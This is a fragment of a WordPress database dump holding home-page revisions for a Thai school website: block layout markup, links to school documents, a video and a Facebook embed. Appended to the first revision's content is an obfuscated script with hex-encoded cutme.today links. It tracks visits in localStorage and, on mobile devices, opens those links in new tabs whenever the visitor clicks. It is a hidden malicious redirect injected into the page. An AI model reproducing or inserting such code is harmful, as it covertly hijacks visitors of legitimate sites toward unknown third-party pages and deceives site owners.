src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 09:49:00','2024-08-30 02:49:00','',19,'http://watprato.ssk.in.th/?p=286',0,'revision','',0),
(287,2,'2024-08-30 09:49:54','2024-08-30 02:49:54','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container 